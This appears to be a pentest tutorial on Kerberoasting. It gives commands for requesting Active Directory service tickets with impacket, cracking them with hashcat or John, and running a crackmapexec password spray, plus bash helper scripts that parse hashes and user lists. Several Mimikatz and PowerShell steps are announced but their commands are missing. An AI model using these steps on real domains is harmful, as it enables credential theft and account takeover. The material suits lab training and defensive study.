Kerberoast

Theory

Kerberoasting is an extremely common attack in Active Directory environments. It targets domain accounts that have a Service Principal Name (SPN) set; these are usually service accounts, such as the accounts that run IIS or MSSQL.

Kerberoasting involves requesting a service ticket (TGS) for such an SPN, either from a domain-joined Windows machine or from a Kali box with a tool such as GetUserSPNs.py. Any authenticated domain user can do this; no special privileges are needed. The problem is that once the DC looks up the target SPN it encrypts the ticket with the long-term key of the account that owns the SPN, and for the default RC4-HMAC encryption type that key is simply the NTLM hash of the account's password. The ticket can therefore be taken offline and cracked by guessing passwords until one reproduces the key. If the account only has AES keys, the ticket is still crackable, just with a slower AES-based hashcat mode.

Having a Credential

Step 1: Impacket-GetUserSPNs

Use impacket-GetUserSPNs to enumerate the accounts with SPNs and request a service ticket for each one. A valid domain credential is required:

impacket-GetUserSPNs '<domain>/<username>:<password>' -dc-ip <target_ip> -request

Step 2: Crack the TGS ticket with hashcat

Save the $krb5tgs$ hash printed for each ticket as hash.txt (or pass -outputfile hash.txt to GetUserSPNs) and crack it with hashcat mode 13100, which is for RC4-HMAC tickets (etype 23). Tickets encrypted with AES (etype 17 or 18) need -m 19600 or -m 19700 instead:

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
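The hashcat step above assumes every line in hash.txt is an RC4 ticket. As an added example (not part of the original page, and not impacket's or hashcat's own code), the following bash script reads the etype from each $krb5tgs$ line, splits a mixed hash file into one file per hashcat mode, and pulls the account name out of each line. The two sample hashes are constructed in the shape GetUserSPNs prints; the hex in them is filler, not real ticket data, and hash.txt / the rockyou path in the closing comment are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: sort the hashes GetUserSPNs writes
# into the right hashcat mode before cracking. Each line starts "$krb5tgs$<etype>$",
# and the etype decides the mode:
#   23 = RC4-HMAC    -> hashcat -m 13100 (the mode used in the step above)
#   17 = AES128-CTS  -> hashcat -m 19600
#   18 = AES256-CTS  -> hashcat -m 19700
# An AES ticket handed to -m 13100 is rejected as a malformed hash, so a mixed
# hash.txt has to be split first.
set -eu

# Constructed sample lines in the shape GetUserSPNs prints (the hex is filler,
# not real ticket data): one RC4 ticket and one AES256 ticket.
SAMPLE_RC4='$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local~1433*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff'
SAMPLE_AES='$krb5tgs$18$svc_http$CORP.LOCAL$*HTTP/web01.corp.local*$0123456789abcdef01234567$00112233445566778899aabbccddeeff'

# Print the hashcat mode for one hash line; return 1 (print nothing) otherwise.
krb5tgs_mode() {
    local etype
    case "$1" in
        '$krb5tgs$'*) ;;
        *) return 1 ;;
    esac
    etype=$(printf '%s' "$1" | cut -d'$' -f3)
    case "$etype" in
        23) echo 13100 ;;
        17) echo 19600 ;;
        18) echo 19700 ;;
        *)  return 1 ;;
    esac
}

# Account name from a hash line. RC4 lines put it as "*user" in the 4th
# '$'-separated field, AES lines as "user"; strip the optional '*'.
krb5tgs_user() {
    local f4
    f4=$(printf '%s' "$1" | cut -d'$' -f4)
    printf '%s\n' "${f4#\*}"
}

# Split a mixed hash file into <file>.13100 / .19600 / .19700 and print
# "<mode> <count>" for each file that got at least one hash. Lines that are not
# Kerberoast hashes (tool banner, column headers, blank lines) are reported on
# stderr and skipped.
split_hashes_by_etype() {
    local infile="$1" line mode
    rm -f "$infile.13100" "$infile.19600" "$infile.19700"
    while IFS= read -r line || [ -n "$line" ]; do
        [ -z "$line" ] && continue
        if mode=$(krb5tgs_mode "$line"); then
            printf '%s\n' "$line" >> "$infile.$mode"
        else
            printf 'skipping non-hash line: %.40s\n' "$line" >&2
        fi
    done < "$infile"
    for mode in 13100 19600 19700; do
        if [ -s "$infile.$mode" ]; then
            printf '%s %s\n' "$mode" "$(wc -l < "$infile.$mode" | tr -d ' ')"
        fi
    done
}

# Self-contained run on the constructed samples plus one header line.
demo_split() {
    local tmp
    tmp=$(mktemp)
    printf '%s\n%s\n%s\n' "$SAMPLE_RC4" 'ServicePrincipalName  Name  MemberOf' "$SAMPLE_AES" > "$tmp"
    split_hashes_by_etype "$tmp" 2>/dev/null
    rm -f "$tmp" "$tmp.13100" "$tmp.19600" "$tmp.19700"
}

# Then one hashcat run per file that exists, e.g.:
#   hashcat -m 13100 hash.txt.13100 /usr/share/wordlists/rockyou.txt
#   hashcat -m 19700 hash.txt.19700 /usr/share/wordlists/rockyou.txt
```

Run it as `split_hashes_by_etype hash.txt` after sourcing the script; each reported mode then gets its own hashcat invocation. Splitting by etype also tells you which accounts are AES-only (no 13100 file for them), which are worth noting, since AES tickets crack much more slowly than RC4 ones.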

Having a Shell

Step 1: GetUserSPNs

Transfer GetUserSPNs.ps1 from the following GitHub repo to the victim machine and run it:

https://github.com/nidem/kerberoast

Step 2: Request service tickets

Execute the following two commands in PowerShell:

Or request the ticket with Mimikatz:

Step 3: Export service ticket to kirbi file

Transfer /usr/share/windows-resources/mimikatz/x64/mimikatz.exe to the victim machine and export the service ticket:

Download the kirbi file to Kali.

Step 4: Crack the kirbi file with John

Convert the kirbi file to John's format:

Note that this kirbi2john.py script is also from the "kerberoast" GitHub repo mentioned above. Don't use the Kali built-in kirbi2john; it did not work at the time of writing.

Crack the hash with John:

Password Spray

Note that users might reuse the same password for different accounts. Once we get a plaintext password, spray it against the username list collected from net user /domain with crackmapexec. Check the domain's lockout threshold (net accounts /domain) first so the spray does not lock accounts out:
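As an added example (not from the original page and not crackmapexec's own code), the bash script below turns the columnar output of net user /domain into a one-per-line user list, reads the lockout threshold from net accounts /domain, and refuses a spray that would exceed it. Both sample outputs are constructed to match the Windows command format, not captured from a real domain; the DC address, user file and password are placeholders, and the crackmapexec command is printed rather than executed so the script runs offline.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: prepare a password spray from the
# output of "net user /domain". The parser turns the three-column listing into
# one username per line, and the lockout check reads "net accounts /domain" so
# the spray stays under the domain's lockout threshold (each spray round costs
# one bad guess per user; a threshold of 0 or "Never" means no lockout).
set -eu

# Constructed sample output of "net user /domain" as pasted from a Windows
# shell (CRLF line endings are tolerated). Not captured from a real domain.
SAMPLE_NET_USER='The request will be processed at a domain controller for domain corp.local.

User accounts for \\DC01.corp.local

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
svc_sql                  svc_http                 jdoe
The command completed successfully.'

# Constructed sample output of "net accounts /domain" (lockout lines only).
SAMPLE_NET_ACCOUNTS='Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
The command completed successfully.'

# stdin: "net user /domain" output. stdout: one username per line, in listing
# order. Names live between the dashed rule and the "The command completed" trailer.
netuser_to_list() {
    awk '
        { sub(/\r$/, "") }                               # tolerate CRLF
        /^-+$/                    { inlist = 1; next }   # dashed rule starts the list
        /^The command completed/  { inlist = 0 }         # trailer ends it
        inlist && NF              { for (i = 1; i <= NF; i++) print $i }
    '
}

# stdin: "net accounts /domain" output. stdout: the lockout threshold
# ("Never" when lockout is disabled).
lockout_threshold() {
    tr -d '\r' | sed -n 's/^Lockout threshold:[[:space:]]*//p'
}

# Decide whether spraying <passwords> guesses per user is safe under the
# threshold; prints "ok" or "lockout". Conservative: stays strictly below the
# threshold rather than using the observation window to reset the counter.
spray_budget() {
    local threshold="$1" passwords="$2"
    case "$threshold" in
        Never|0) echo ok ;;
        *) if [ "$passwords" -lt "$threshold" ]; then echo ok; else echo lockout; fi ;;
    esac
}

# Build the crackmapexec command for one password against the user list.
# dc_ip defaults to a placeholder; the command is printed, not run.
spray_cmd() {
    local userfile="$1" password="$2" dc_ip="${3:-<dc_ip>}"
    printf "crackmapexec smb %s -u %s -p '%s' --continue-on-success\n" "$dc_ip" "$userfile" "$password"
}

# Typical use, with the sample data standing in for the real command output:
#   printf '%s\n' "$SAMPLE_NET_USER" | netuser_to_list > users.txt
#   [ "$(spray_budget "$(printf '%s\n' "$SAMPLE_NET_ACCOUNTS" | lockout_threshold)" 1)" = ok ] \
#       && spray_cmd users.txt '<cracked_password>' <dc_ip>
```

The --continue-on-success flag keeps crackmapexec going after the first hit so every account reusing the password is reported in one pass. If the threshold is low, spray one password per observation window rather than several in a row.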
